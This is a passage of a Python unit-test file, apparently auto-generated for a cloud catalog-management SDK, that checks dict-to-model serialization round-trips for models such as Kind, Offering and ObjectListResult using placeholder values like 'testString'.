        # CategoryFilter dict kept for parity with the schema; not referenced below.
        category_filter_model = {
            'include': True,
            'filter': filter_terms_model,
        }
        id_filter_model = {  # IDFilter
            'include': filter_terms_model,
            'exclude': filter_terms_model,
        }
        filters_model = {  # Filters
            'include_all': True,
            'category_filters': {},
            'id_filters': id_filter_model,
        }
        syndication_cluster_model = {  # SyndicationCluster
            'region': 'testString',
            'id': 'testString',
            'name': 'testString',
            'resource_group_name': 'testString',
            'type': 'testString',
            'namespaces': ['testString'],
            'all_namespaces': True,
        }
        syndication_history_model = {  # SyndicationHistory
            'namespaces': ['testString'],
            'clusters': [syndication_cluster_model],
            'last_run': '2019-01-01T12:00:00Z',
        }
        syndication_authorization_model = {  # SyndicationAuthorization
            'token': 'testString',
            'last_run': '2019-01-01T12:00:00Z',
        }
        syndication_resource_model = {  # SyndicationResource
            'remove_related_components': True,
            'clusters': [syndication_cluster_model],
            'history': syndication_history_model,
            'authorization': syndication_authorization_model,
        }
        catalog_model = {  # Catalog
            'id': 'testString',
            '_rev': 'testString',
            'label': 'testString',
            'short_description': 'testString',
            'catalog_icon_url': 'testString',
            'tags': ['testString'],
            'url': 'testString',
            'crn': 'testString',
            'offerings_url': 'testString',
            'features': [feature_model],
            'disabled': True,
            'created': '2019-01-01T12:00:00Z',
            'updated': '2019-01-01T12:00:00Z',
            'resource_group_id': 'testString',
            'owning_account': 'testString',
            'catalog_filters': filters_model,
            'syndication_settings': syndication_resource_model,
            'kind': 'testString',
        }
        # JSON (dict) form of the CatalogSearchResult model under test.
        catalog_search_result_model_json = {
            'total_count': 38,
            'resources': [catalog_model],
        }
        # Deserialize: dict -> model instance.
        catalog_search_result_model = CatalogSearchResult.from_dict(catalog_search_result_model_json)
        assert catalog_search_result_model != False
        # Re-instantiate from the first instance's attribute dict.
        catalog_search_result_model2 = CatalogSearchResult(
            **CatalogSearchResult.from_dict(catalog_search_result_model_json).__dict__
        )
        # Both instances must compare equal.
        assert catalog_search_result_model == catalog_search_result_model2
        # Serialize back: model -> dict must round-trip without loss.
        assert catalog_search_result_model.to_dict() == catalog_search_result_model_json
class TestModel_CategoryFilter():
    """
    Test Class for CategoryFilter
    """

    def test_category_filter_serialization(self):
        """
        Test serialization/deserialization for CategoryFilter
        """
        # Nested FilterTerms dict referenced by the filter under test.
        filter_terms_model = {'filter_terms': ['testString']}  # FilterTerms
        # JSON (dict) form of the CategoryFilter model under test.
        category_filter_model_json = {
            'include': True,
            'filter': filter_terms_model,
        }
        # Deserialize: dict -> model instance.
        category_filter_model = CategoryFilter.from_dict(category_filter_model_json)
        assert category_filter_model != False
        # Re-instantiate from the first instance's attribute dict.
        category_filter_model2 = CategoryFilter(
            **CategoryFilter.from_dict(category_filter_model_json).__dict__
        )
        # Both instances must compare equal.
        assert category_filter_model == category_filter_model2
        # Serialize back: model -> dict must round-trip without loss.
        assert category_filter_model.to_dict() == category_filter_model_json
class TestModel_ClusterInfo():
    """
    Test Class for ClusterInfo
    """

    def test_cluster_info_serialization(self):
        """
        Test serialization/deserialization for ClusterInfo
        """
        # JSON (dict) form of the ClusterInfo model under test.
        cluster_info_model_json = {
            'resource_group_id': 'testString',
            'resource_group_name': 'testString',
            'id': 'testString',
            'name': 'testString',
            'region': 'testString',
        }
        # Deserialize: dict -> model instance.
        cluster_info_model = ClusterInfo.from_dict(cluster_info_model_json)
        assert cluster_info_model != False
        # Re-instantiate from the first instance's attribute dict.
        cluster_info_model2 = ClusterInfo(
            **ClusterInfo.from_dict(cluster_info_model_json).__dict__
        )
        # Both instances must compare equal.
        assert cluster_info_model == cluster_info_model2
        # Serialize back: model -> dict must round-trip without loss.
        assert cluster_info_model.to_dict() == cluster_info_model_json
class TestModel_Configuration():
    """
    Test Class for Configuration
    """

    def test_configuration_serialization(self):
        """
        Test serialization/deserialization for Configuration
        """
        # JSON (dict) form of the Configuration model under test.
        configuration_model_json = {
            'key': 'testString',
            'type': 'testString',
            'default_value': {'foo': 'bar'},
            'value_constraint': 'testString',
            'description': 'testString',
            'required': True,
            'options': [{'foo': 'bar'}],
            'hidden': True,
        }
        # Deserialize: dict -> model instance.
        configuration_model = Configuration.from_dict(configuration_model_json)
        assert configuration_model != False
        # Re-instantiate from the first instance's attribute dict.
        configuration_model2 = Configuration(
            **Configuration.from_dict(configuration_model_json).__dict__
        )
        # Both instances must compare equal.
        assert configuration_model == configuration_model2
        # Serialize back: model -> dict must round-trip without loss.
        assert configuration_model.to_dict() == configuration_model_json
class TestModel_DeployRequestBodySchematics():
    """
    Test Class for DeployRequestBodySchematics
    """

    def test_deploy_request_body_schematics_serialization(self):
        """
        Test serialization/deserialization for DeployRequestBodySchematics
        """
        # JSON (dict) form of the DeployRequestBodySchematics model under test.
        deploy_request_body_schematics_model_json = {
            'name': 'testString',
            'description': 'testString',
            'tags': ['testString'],
            'resource_group_id': 'testString',
        }
        # Deserialize: dict -> model instance.
        deploy_request_body_schematics_model = DeployRequestBodySchematics.from_dict(
            deploy_request_body_schematics_model_json
        )
        assert deploy_request_body_schematics_model != False
        # Re-instantiate from the first instance's attribute dict.
        deploy_request_body_schematics_model2 = DeployRequestBodySchematics(
            **DeployRequestBodySchematics.from_dict(deploy_request_body_schematics_model_json).__dict__
        )
        # Both instances must compare equal.
        assert deploy_request_body_schematics_model == deploy_request_body_schematics_model2
        # Serialize back: model -> dict must round-trip without loss.
        assert deploy_request_body_schematics_model.to_dict() == deploy_request_body_schematics_model_json
class TestModel_Deployment():
    """
    Test Class for Deployment
    """

    def test_deployment_serialization(self):
        """
        Test serialization/deserialization for Deployment
        """
        # JSON (dict) form of the Deployment model under test.
        deployment_model_json = {
            'id': 'testString',
            'label': 'testString',
            'name': 'testString',
            'short_description': 'testString',
            'long_description': 'testString',
            'metadata': {},
            'tags': ['testString'],
            'created': '2019-01-01T12:00:00Z',
            'updated': '2019-01-01T12:00:00Z',
        }
        # Deserialize: dict -> model instance.
        deployment_model = Deployment.from_dict(deployment_model_json)
        assert deployment_model != False
        # Re-instantiate from the first instance's attribute dict.
        deployment_model2 = Deployment(
            **Deployment.from_dict(deployment_model_json).__dict__
        )
        # Both instances must compare equal.
        assert deployment_model == deployment_model2
        # Serialize back: model -> dict must round-trip without loss.
        assert deployment_model.to_dict() == deployment_model_json
class TestModel_Feature():
    """
    Test Class for Feature
    """

    def test_feature_serialization(self):
        """
        Test serialization/deserialization for Feature
        """
        # JSON (dict) form of the Feature model under test.
        feature_model_json = {
            'title': 'testString',
            'description': 'testString',
        }
        # Deserialize: dict -> model instance.
        feature_model = Feature.from_dict(feature_model_json)
        assert feature_model != False
        # Re-instantiate from the first instance's attribute dict.
        feature_model2 = Feature(**Feature.from_dict(feature_model_json).__dict__)
        # Both instances must compare equal.
        assert feature_model == feature_model2
        # Serialize back: model -> dict must round-trip without loss.
        assert feature_model.to_dict() == feature_model_json
class TestModel_FilterTerms():
    """
    Test Class for FilterTerms
    """

    def test_filter_terms_serialization(self):
        """
        Test serialization/deserialization for FilterTerms
        """
        # JSON (dict) form of the FilterTerms model under test.
        filter_terms_model_json = {'filter_terms': ['testString']}
        # Deserialize: dict -> model instance.
        filter_terms_model = FilterTerms.from_dict(filter_terms_model_json)
        assert filter_terms_model != False
        # Re-instantiate from the first instance's attribute dict.
        filter_terms_model2 = FilterTerms(
            **FilterTerms.from_dict(filter_terms_model_json).__dict__
        )
        # Both instances must compare equal.
        assert filter_terms_model == filter_terms_model2
        # Serialize back: model -> dict must round-trip without loss.
        assert filter_terms_model.to_dict() == filter_terms_model_json
class TestModel_Filters():
    """
    Test Class for Filters
    """

    def test_filters_serialization(self):
        """
        Test serialization/deserialization for Filters
        """
        # Nested model dicts needed to build a Filters model.
        filter_terms_model = {'filter_terms': ['testString']}  # FilterTerms
        # CategoryFilter dict kept for parity with the schema; not referenced below.
        category_filter_model = {
            'include': True,
            'filter': filter_terms_model,
        }
        id_filter_model = {  # IDFilter
            'include': filter_terms_model,
            'exclude': filter_terms_model,
        }
        # JSON (dict) form of the Filters model under test.
        filters_model_json = {
            'include_all': True,
            'category_filters': {},
            'id_filters': id_filter_model,
        }
        # Deserialize: dict -> model instance.
        filters_model = Filters.from_dict(filters_model_json)
        assert filters_model != False
        # Re-instantiate from the first instance's attribute dict.
        filters_model2 = Filters(**Filters.from_dict(filters_model_json).__dict__)
        # Both instances must compare equal.
        assert filters_model == filters_model2
        # Serialize back: model -> dict must round-trip without loss.
        assert filters_model.to_dict() == filters_model_json
class TestModel_IDFilter():
    """
    Test Class for IDFilter
    """

    def test_id_filter_serialization(self):
        """
        Test serialization/deserialization for IDFilter
        """
        # Nested FilterTerms dict shared by both sides of the filter.
        filter_terms_model = {'filter_terms': ['testString']}  # FilterTerms
        # JSON (dict) form of the IDFilter model under test.
        id_filter_model_json = {
            'include': filter_terms_model,
            'exclude': filter_terms_model,
        }
        # Deserialize: dict -> model instance.
        id_filter_model = IDFilter.from_dict(id_filter_model_json)
        assert id_filter_model != False
        # Re-instantiate from the first instance's attribute dict.
        id_filter_model2 = IDFilter(**IDFilter.from_dict(id_filter_model_json).__dict__)
        # Both instances must compare equal.
        assert id_filter_model == id_filter_model2
        # Serialize back: model -> dict must round-trip without loss.
        assert id_filter_model.to_dict() == id_filter_model_json
class TestModel_Image():
    """
    Test Class for Image
    """

    def test_image_serialization(self):
        """
        Test serialization/deserialization for Image
        """
        # JSON (dict) form of the Image model under test.
        image_model_json = {'image': 'testString'}
        # Deserialize: dict -> model instance.
        image_model = Image.from_dict(image_model_json)
        assert image_model != False
        # Re-instantiate from the first instance's attribute dict.
        image_model2 = Image(**Image.from_dict(image_model_json).__dict__)
        # Both instances must compare equal.
        assert image_model == image_model2
        # Serialize back: model -> dict must round-trip without loss.
        assert image_model.to_dict() == image_model_json
class TestModel_ImageManifest():
    """
    Test Class for ImageManifest
    """

    def test_image_manifest_serialization(self):
        """
        Test serialization/deserialization for ImageManifest
        """
        # Nested Image dict listed in the manifest.
        image_model = {'image': 'testString'}  # Image
        # JSON (dict) form of the ImageManifest model under test.
        image_manifest_model_json = {
            'description': 'testString',
            'images': [image_model],
        }
        # Deserialize: dict -> model instance.
        image_manifest_model = ImageManifest.from_dict(image_manifest_model_json)
        assert image_manifest_model != False
        # Re-instantiate from the first instance's attribute dict.
        image_manifest_model2 = ImageManifest(
            **ImageManifest.from_dict(image_manifest_model_json).__dict__
        )
        # Both instances must compare equal.
        assert image_manifest_model == image_manifest_model2
        # Serialize back: model -> dict must round-trip without loss.
        assert image_manifest_model.to_dict() == image_manifest_model_json
class TestModel_InstallStatus():
    """
    Test Class for InstallStatus
    """

    def test_install_status_serialization(self):
        """
        Test serialization/deserialization for InstallStatus
        """
        # Nested model dicts composing an InstallStatus.
        install_status_metadata_model = {  # InstallStatusMetadata
            'cluster_id': 'testString',
            'region': 'testString',
            'namespace': 'testString',
            'workspace_id': 'testString',
            'workspace_name': 'testString',
        }
        install_status_release_model = {  # InstallStatusRelease
            'deployments': [{}],
            'replicasets': [{}],
            'statefulsets': [{}],
            'pods': [{}],
            'errors': [{}],
        }
        install_status_content_mgmt_model = {  # InstallStatusContentMgmt
            'pods': [{}],
            'errors': [{}],
        }
        # JSON (dict) form of the InstallStatus model under test.
        install_status_model_json = {
            'metadata': install_status_metadata_model,
            'release': install_status_release_model,
            'content_mgmt': install_status_content_mgmt_model,
        }
        # Deserialize: dict -> model instance.
        install_status_model = InstallStatus.from_dict(install_status_model_json)
        assert install_status_model != False
        # Re-instantiate from the first instance's attribute dict.
        install_status_model2 = InstallStatus(
            **InstallStatus.from_dict(install_status_model_json).__dict__
        )
        # Both instances must compare equal.
        assert install_status_model == install_status_model2
        # Serialize back: model -> dict must round-trip without loss.
        assert install_status_model.to_dict() == install_status_model_json
class TestModel_InstallStatusContentMgmt():
    """
    Test Class for InstallStatusContentMgmt
    """

    def test_install_status_content_mgmt_serialization(self):
        """
        Test serialization/deserialization for InstallStatusContentMgmt
        """
        # JSON (dict) form of the InstallStatusContentMgmt model under test.
        install_status_content_mgmt_model_json = {
            'pods': [{}],
            'errors': [{}],
        }
        # Deserialize: dict -> model instance.
        install_status_content_mgmt_model = InstallStatusContentMgmt.from_dict(
            install_status_content_mgmt_model_json
        )
        assert install_status_content_mgmt_model != False
        # Re-instantiate from the first instance's attribute dict.
        install_status_content_mgmt_model2 = InstallStatusContentMgmt(
            **InstallStatusContentMgmt.from_dict(install_status_content_mgmt_model_json).__dict__
        )
        # Both instances must compare equal.
        assert install_status_content_mgmt_model == install_status_content_mgmt_model2
        # Serialize back: model -> dict must round-trip without loss.
        assert install_status_content_mgmt_model.to_dict() == install_status_content_mgmt_model_json
class TestModel_InstallStatusMetadata():
    """
    Test Class for InstallStatusMetadata
    """

    def test_install_status_metadata_serialization(self):
        """
        Test serialization/deserialization for InstallStatusMetadata
        """
        # JSON (dict) form of the InstallStatusMetadata model under test.
        install_status_metadata_model_json = {
            'cluster_id': 'testString',
            'region': 'testString',
            'namespace': 'testString',
            'workspace_id': 'testString',
            'workspace_name': 'testString',
        }
        # Deserialize: dict -> model instance.
        install_status_metadata_model = InstallStatusMetadata.from_dict(install_status_metadata_model_json)
        assert install_status_metadata_model != False
        # Re-instantiate from the first instance's attribute dict.
        install_status_metadata_model2 = InstallStatusMetadata(
            **InstallStatusMetadata.from_dict(install_status_metadata_model_json).__dict__
        )
        # Both instances must compare equal.
        assert install_status_metadata_model == install_status_metadata_model2
        # Serialize back: model -> dict must round-trip without loss.
        assert install_status_metadata_model.to_dict() == install_status_metadata_model_json
class TestModel_InstallStatusRelease():
    """
    Test Class for InstallStatusRelease
    """

    def test_install_status_release_serialization(self):
        """
        Test serialization/deserialization for InstallStatusRelease
        """
        # JSON (dict) form of the InstallStatusRelease model under test.
        install_status_release_model_json = {
            'deployments': [{}],
            'replicasets': [{}],
            'statefulsets': [{}],
            'pods': [{}],
            'errors': [{}],
        }
        # Deserialize: dict -> model instance.
        install_status_release_model = InstallStatusRelease.from_dict(install_status_release_model_json)
        assert install_status_release_model != False
        # Re-instantiate from the first instance's attribute dict.
        install_status_release_model2 = InstallStatusRelease(
            **InstallStatusRelease.from_dict(install_status_release_model_json).__dict__
        )
        # Both instances must compare equal.
        assert install_status_release_model == install_status_release_model2
        # Serialize back: model -> dict must round-trip without loss.
        assert install_status_release_model.to_dict() == install_status_release_model_json
class TestModel_Kind():
    """
    Test Class for Kind
    """

    def test_kind_serialization(self):
        """
        Test serialization/deserialization for Kind
        """
        # Dict forms of every nested model a Kind embeds.
        feature_model = {  # Feature
            'title': 'testString',
            'description': 'testString',
        }
        configuration_model = {  # Configuration
            'key': 'testString',
            'type': 'testString',
            'default_value': {'foo': 'bar'},
            'value_constraint': 'testString',
            'description': 'testString',
            'required': True,
            'options': [{'foo': 'bar'}],
            'hidden': True,
        }
        validation_model = {  # Validation
            'validated': '2019-01-01T12:00:00Z',
            'requested': '2019-01-01T12:00:00Z',
            'state': 'testString',
            'last_operation': 'testString',
            'target': {},
        }
        resource_model = {  # Resource
            'type': 'mem',
            'value': {'foo': 'bar'},
        }
        script_model = {  # Script
            'instructions': 'testString',
            'script': 'testString',
            'script_permission': 'testString',
            'delete_script': 'testString',
            'scope': 'testString',
        }
        version_entitlement_model = {  # VersionEntitlement
            'provider_name': 'testString',
            'provider_id': 'testString',
            'product_id': 'testString',
            'part_numbers': ['testString'],
            'image_repo_name': 'testString',
        }
        license_model = {  # License
            'id': 'testString',
            'name': 'testString',
            'type': 'testString',
            'url': 'testString',
            'description': 'testString',
        }
        state_model = {  # State
            'current': 'testString',
            'current_entered': '2019-01-01T12:00:00Z',
            'pending': 'testString',
            'pending_requested': '2019-01-01T12:00:00Z',
            'previous': 'testString',
        }
        version_model = {  # Version
            'id': 'testString',
            '_rev': 'testString',
            'crn': 'testString',
            'version': 'testString',
            'sha': 'testString',
            'created': '2019-01-01T12:00:00Z',
            'updated': '2019-01-01T12:00:00Z',
            'offering_id': 'testString',
            'catalog_id': 'testString',
            'kind_id': 'testString',
            'tags': ['testString'],
            'repo_url': 'testString',
            'source_url': 'testString',
            'tgz_url': 'testString',
            'configuration': [configuration_model],
            'metadata': {},
            'validation': validation_model,
            'required_resources': [resource_model],
            'single_instance': True,
            'install': script_model,
            'pre_install': [script_model],
            'entitlement': version_entitlement_model,
            'licenses': [license_model],
            'image_manifest_url': 'testString',
            'deprecated': True,
            'package_version': 'testString',
            'state': state_model,
            'version_locator': 'testString',
            'console_url': 'testString',
            'long_description': 'testString',
            'whitelisted_accounts': ['testString'],
        }
        deployment_model = {  # Deployment
            'id': 'testString',
            'label': 'testString',
            'name': 'testString',
            'short_description': 'testString',
            'long_description': 'testString',
            'metadata': {},
            'tags': ['testString'],
            'created': '2019-01-01T12:00:00Z',
            'updated': '2019-01-01T12:00:00Z',
        }
        plan_model = {  # Plan
            'id': 'testString',
            'label': 'testString',
            'name': 'testString',
            'short_description': 'testString',
            'long_description': 'testString',
            'metadata': {},
            'tags': ['testString'],
            'additional_features': [feature_model],
            'created': '2019-01-01T12:00:00Z',
            'updated': '2019-01-01T12:00:00Z',
            'deployments': [deployment_model],
        }
        # JSON (dict) form of the Kind model under test.
        kind_model_json = {
            'id': 'testString',
            'format_kind': 'testString',
            'target_kind': 'testString',
            'metadata': {},
            'install_description': 'testString',
            'tags': ['testString'],
            'additional_features': [feature_model],
            'created': '2019-01-01T12:00:00Z',
            'updated': '2019-01-01T12:00:00Z',
            'versions': [version_model],
            'plans': [plan_model],
        }
        # Deserialize: dict -> model instance.
        kind_model = Kind.from_dict(kind_model_json)
        assert kind_model != False
        # Re-instantiate from the first instance's attribute dict.
        kind_model2 = Kind(**Kind.from_dict(kind_model_json).__dict__)
        # Both instances must compare equal.
        assert kind_model == kind_model2
        # Serialize back: model -> dict must round-trip without loss.
        assert kind_model.to_dict() == kind_model_json
class TestModel_License():
    """
    Test Class for License
    """

    def test_license_serialization(self):
        """
        Test serialization/deserialization for License
        """
        # JSON (dict) form of the License model under test.
        license_model_json = {
            'id': 'testString',
            'name': 'testString',
            'type': 'testString',
            'url': 'testString',
            'description': 'testString',
        }
        # Deserialize: dict -> model instance.
        license_model = License.from_dict(license_model_json)
        assert license_model != False
        # Re-instantiate from the first instance's attribute dict.
        license_model2 = License(**License.from_dict(license_model_json).__dict__)
        # Both instances must compare equal.
        assert license_model == license_model2
        # Serialize back: model -> dict must round-trip without loss.
        assert license_model.to_dict() == license_model_json
class TestModel_NamespaceSearchResult():
    """
    Test Class for NamespaceSearchResult
    """

    def test_namespace_search_result_serialization(self):
        """
        Test serialization/deserialization for NamespaceSearchResult
        """
        # JSON (dict) form of the NamespaceSearchResult model under test.
        namespace_search_result_model_json = {
            'offset': 38,
            'limit': 38,
            'total_count': 38,
            'resource_count': 38,
            'first': 'testString',
            'last': 'testString',
            'prev': 'testString',
            'next': 'testString',
            'resources': ['testString'],
        }
        # Deserialize: dict -> model instance.
        namespace_search_result_model = NamespaceSearchResult.from_dict(namespace_search_result_model_json)
        assert namespace_search_result_model != False
        # Re-instantiate from the first instance's attribute dict.
        namespace_search_result_model2 = NamespaceSearchResult(
            **NamespaceSearchResult.from_dict(namespace_search_result_model_json).__dict__
        )
        # Both instances must compare equal.
        assert namespace_search_result_model == namespace_search_result_model2
        # Serialize back: model -> dict must round-trip without loss.
        assert namespace_search_result_model.to_dict() == namespace_search_result_model_json
class TestModel_ObjectAccess():
    """
    Test Class for ObjectAccess
    """

    def test_object_access_serialization(self):
        """
        Test serialization/deserialization for ObjectAccess
        """
        # JSON representation of an ObjectAccess model, as a literal.
        json_repr = {
            'id': 'testString',
            'account': 'testString',
            'catalog_id': 'testString',
            'target_id': 'testString',
            'create': "2019-01-01T12:00:00Z",
        }
        # Deserialize the JSON into a model instance.
        model = ObjectAccess.from_dict(json_repr)
        assert model != False
        # Rebuild a second instance directly from the attribute dict.
        attrs = ObjectAccess.from_dict(json_repr).__dict__
        twin = ObjectAccess(**attrs)
        # Both construction paths must produce equivalent models.
        assert model == twin
        # Round-tripping back to a dict must be lossless.
        assert model.to_dict() == json_repr
class TestModel_ObjectAccessListResult():
    """
    Test Class for ObjectAccessListResult
    """

    def test_object_access_list_result_serialization(self):
        """
        Test serialization/deserialization for ObjectAccessListResult
        """
        # Dict form of the nested ObjectAccess model.
        object_access = {
            'id': 'testString',
            'account': 'testString',
            'catalog_id': 'testString',
            'target_id': 'testString',
            'create': "2019-01-01T12:00:00Z",
        }
        # JSON representation of an ObjectAccessListResult model.
        json_repr = {
            'offset': 38,
            'limit': 38,
            'total_count': 38,
            'resource_count': 38,
            'first': 'testString',
            'last': 'testString',
            'prev': 'testString',
            'next': 'testString',
            'resources': [object_access],
        }
        # Deserialize the JSON into a model instance.
        model = ObjectAccessListResult.from_dict(json_repr)
        assert model != False
        # Rebuild a second instance directly from the attribute dict.
        attrs = ObjectAccessListResult.from_dict(json_repr).__dict__
        twin = ObjectAccessListResult(**attrs)
        # Both construction paths must produce equivalent models.
        assert model == twin
        # Round-tripping back to a dict must be lossless.
        assert model.to_dict() == json_repr
class TestModel_ObjectListResult():
    """
    Test Class for ObjectListResult
    """

    def test_object_list_result_serialization(self):
        """
        Test serialization/deserialization for ObjectListResult
        """
        # Dict forms of the nested models needed to build a CatalogObject.
        publish = {  # PublishObject
            'permit_ibm_public_publish': True,
            'ibm_approved': True,
            'public_approved': True,
            'portal_approval_record': 'testString',
            'portal_url': 'testString',
        }
        state = {  # State
            'current': 'testString',
            'current_entered': "2019-01-01T12:00:00Z",
            'pending': 'testString',
            'pending_requested': "2019-01-01T12:00:00Z",
            'previous': 'testString',
        }
        catalog_object = {  # CatalogObject
            'id': 'testString',
            'name': 'testString',
            '_rev': 'testString',
            'crn': 'testString',
            'url': 'testString',
            'parent_id': 'testString',
            'label_i18n': 'testString',
            'label': 'testString',
            'tags': ['testString'],
            'created': "2019-01-01T12:00:00Z",
            'updated': "2019-01-01T12:00:00Z",
            'short_description': 'testString',
            'short_description_i18n': 'testString',
            'kind': 'testString',
            'publish': publish,
            'state': state,
            'catalog_id': 'testString',
            'catalog_name': 'testString',
            'data': {},
        }
        # JSON representation of an ObjectListResult model.
        json_repr = {
            'offset': 38,
            'limit': 38,
            'total_count': 38,
            'resource_count': 38,
            'first': 'testString',
            'last': 'testString',
            'prev': 'testString',
            'next': 'testString',
            'resources': [catalog_object],
        }
        # Deserialize the JSON into a model instance.
        model = ObjectListResult.from_dict(json_repr)
        assert model != False
        # Rebuild a second instance directly from the attribute dict.
        attrs = ObjectListResult.from_dict(json_repr).__dict__
        twin = ObjectListResult(**attrs)
        # Both construction paths must produce equivalent models.
        assert model == twin
        # Round-tripping back to a dict must be lossless.
        assert model.to_dict() == json_repr
class TestModel_ObjectSearchResult():
    """
    Test Class for ObjectSearchResult
    """

    def test_object_search_result_serialization(self):
        """
        Test serialization/deserialization for ObjectSearchResult
        """
        # Dict forms of the nested models needed to build a CatalogObject.
        publish = {  # PublishObject
            'permit_ibm_public_publish': True,
            'ibm_approved': True,
            'public_approved': True,
            'portal_approval_record': 'testString',
            'portal_url': 'testString',
        }
        state = {  # State
            'current': 'testString',
            'current_entered': "2019-01-01T12:00:00Z",
            'pending': 'testString',
            'pending_requested': "2019-01-01T12:00:00Z",
            'previous': 'testString',
        }
        catalog_object = {  # CatalogObject
            'id': 'testString',
            'name': 'testString',
            '_rev': 'testString',
            'crn': 'testString',
            'url': 'testString',
            'parent_id': 'testString',
            'label_i18n': 'testString',
            'label': 'testString',
            'tags': ['testString'],
            'created': "2019-01-01T12:00:00Z",
            'updated': "2019-01-01T12:00:00Z",
            'short_description': 'testString',
            'short_description_i18n': 'testString',
            'kind': 'testString',
            'publish': publish,
            'state': state,
            'catalog_id': 'testString',
            'catalog_name': 'testString',
            'data': {},
        }
        # JSON representation of an ObjectSearchResult model.
        json_repr = {
            'offset': 38,
            'limit': 38,
            'total_count': 38,
            'resource_count': 38,
            'first': 'testString',
            'last': 'testString',
            'prev': 'testString',
            'next': 'testString',
            'resources': [catalog_object],
        }
        # Deserialize the JSON into a model instance.
        model = ObjectSearchResult.from_dict(json_repr)
        assert model != False
        # Rebuild a second instance directly from the attribute dict.
        attrs = ObjectSearchResult.from_dict(json_repr).__dict__
        twin = ObjectSearchResult(**attrs)
        # Both construction paths must produce equivalent models.
        assert model == twin
        # Round-tripping back to a dict must be lossless.
        assert model.to_dict() == json_repr
class TestModel_Offering():
    """
    Test Class for Offering
    """

    def test_offering_serialization(self):
        """
        Test serialization/deserialization for Offering
        """
        # Dict forms of all nested models needed to build an Offering.
        rating = {  # Rating
            'one_star_count': 38,
            'two_star_count': 38,
            'three_star_count': 38,
            'four_star_count': 38,
        }
        feature = {  # Feature
            'title': 'testString',
            'description': 'testString',
        }
        configuration = {  # Configuration
            'key': 'testString',
            'type': 'testString',
            'default_value': { 'foo': 'bar' },
            'value_constraint': 'testString',
            'description': 'testString',
            'required': True,
            'options': [{ 'foo': 'bar' }],
            'hidden': True,
        }
        validation = {  # Validation
            'validated': "2019-01-01T12:00:00Z",
            'requested': "2019-01-01T12:00:00Z",
            'state': 'testString',
            'last_operation': 'testString',
            'target': {},
        }
        resource = {  # Resource
            'type': 'mem',
            'value': { 'foo': 'bar' },
        }
        script = {  # Script
            'instructions': 'testString',
            'script': 'testString',
            'script_permission': 'testString',
            'delete_script': 'testString',
            'scope': 'testString',
        }
        entitlement = {  # VersionEntitlement
            'provider_name': 'testString',
            'provider_id': 'testString',
            'product_id': 'testString',
            'part_numbers': ['testString'],
            'image_repo_name': 'testString',
        }
        license = {  # License
            'id': 'testString',
            'name': 'testString',
            'type': 'testString',
            'url': 'testString',
            'description': 'testString',
        }
        state = {  # State
            'current': 'testString',
            'current_entered': "2019-01-01T12:00:00Z",
            'pending': 'testString',
            'pending_requested': "2019-01-01T12:00:00Z",
            'previous': 'testString',
        }
        version = {  # Version
            'id': 'testString',
            '_rev': 'testString',
            'crn': 'testString',
            'version': 'testString',
            'sha': 'testString',
            'created': "2019-01-01T12:00:00Z",
            'updated': "2019-01-01T12:00:00Z",
            'offering_id': 'testString',
            'catalog_id': 'testString',
            'kind_id': 'testString',
            'tags': ['testString'],
            'repo_url': 'testString',
            'source_url': 'testString',
            'tgz_url': 'testString',
            'configuration': [configuration],
            'metadata': {},
            'validation': validation,
            'required_resources': [resource],
            'single_instance': True,
            'install': script,
            'pre_install': [script],
            'entitlement': entitlement,
            'licenses': [license],
            'image_manifest_url': 'testString',
            'deprecated': True,
            'package_version': 'testString',
            'state': state,
            'version_locator': 'testString',
            'console_url': 'testString',
            'long_description': 'testString',
            'whitelisted_accounts': ['testString'],
        }
        deployment = {  # Deployment
            'id': 'testString',
            'label': 'testString',
            'name': 'testString',
            'short_description': 'testString',
            'long_description': 'testString',
            'metadata': {},
            'tags': ['testString'],
            'created': "2019-01-01T12:00:00Z",
            'updated': "2019-01-01T12:00:00Z",
        }
        plan = {  # Plan
            'id': 'testString',
            'label': 'testString',
            'name': 'testString',
            'short_description': 'testString',
            'long_description': 'testString',
            'metadata': {},
            'tags': ['testString'],
            'additional_features': [feature],
            'created': "2019-01-01T12:00:00Z",
            'updated': "2019-01-01T12:00:00Z",
            'deployments': [deployment],
        }
        kind = {  # Kind
            'id': 'testString',
            'format_kind': 'testString',
            'target_kind': 'testString',
            'metadata': {},
            'install_description': 'testString',
            'tags': ['testString'],
            'additional_features': [feature],
            'created': "2019-01-01T12:00:00Z",
            'updated': "2019-01-01T12:00:00Z",
            'versions': [version],
            'plans': [plan],
        }
        repo_info = {  # RepoInfo
            'token': 'testString',
            'type': 'testString',
        }
        # JSON representation of an Offering model.
        json_repr = {
            'id': 'testString',
            '_rev': 'testString',
            'url': 'testString',
            'crn': 'testString',
            'label': 'testString',
            'name': 'testString',
            'offering_icon_url': 'testString',
            'offering_docs_url': 'testString',
            'offering_support_url': 'testString',
            'tags': ['testString'],
            'keywords': ['testString'],
            'rating': rating,
            'created': "2019-01-01T12:00:00Z",
            'updated': "2019-01-01T12:00:00Z",
            'short_description': 'testString',
            'long_description': 'testString',
            'features': [feature],
            'kinds': [kind],
            'permit_request_ibm_public_publish': True,
            'ibm_publish_approved': True,
            'public_publish_approved': True,
            'public_original_crn': 'testString',
            'publish_public_crn': 'testString',
            'portal_approval_record': 'testString',
            'portal_ui_url': 'testString',
            'catalog_id': 'testString',
            'catalog_name': 'testString',
            'metadata': {},
            'disclaimer': 'testString',
            'hidden': True,
            'provider': 'testString',
            'repo_info': repo_info,
        }
        # Deserialize the JSON into a model instance.
        model = Offering.from_dict(json_repr)
        assert model != False
        # Rebuild a second instance directly from the attribute dict.
        attrs = Offering.from_dict(json_repr).__dict__
        twin = Offering(**attrs)
        # Both construction paths must produce equivalent models.
        assert model == twin
        # Round-tripping back to a dict must be lossless.
        assert model.to_dict() == json_repr
class TestModel_OfferingInstance():
    """
    Test Class for OfferingInstance
    """

    def test_offering_instance_serialization(self):
        """
        Test serialization/deserialization for OfferingInstance
        """
        # Dict form of the nested OfferingInstanceLastOperation model.
        last_operation = {
            'operation': 'testString',
            'state': 'testString',
            'message': 'testString',
            'transaction_id': 'testString',
            'updated': 'testString',
        }
        # JSON representation of an OfferingInstance model.
        json_repr = {
            'id': 'testString',
            '_rev': 'testString',
            'url': 'testString',
            'crn': 'testString',
            'label': 'testString',
            'catalog_id': 'testString',
            'offering_id': 'testString',
            'kind_format': 'testString',
            'version': 'testString',
            'cluster_id': 'testString',
            'cluster_region': 'testString',
            'cluster_namespaces': ['testString'],
            'cluster_all_namespaces': True,
            'schematics_workspace_id': 'testString',
            'resource_group_id': 'testString',
            'install_plan': 'testString',
            'channel': 'testString',
            'metadata': {},
            'last_operation': last_operation,
        }
        # Deserialize the JSON into a model instance.
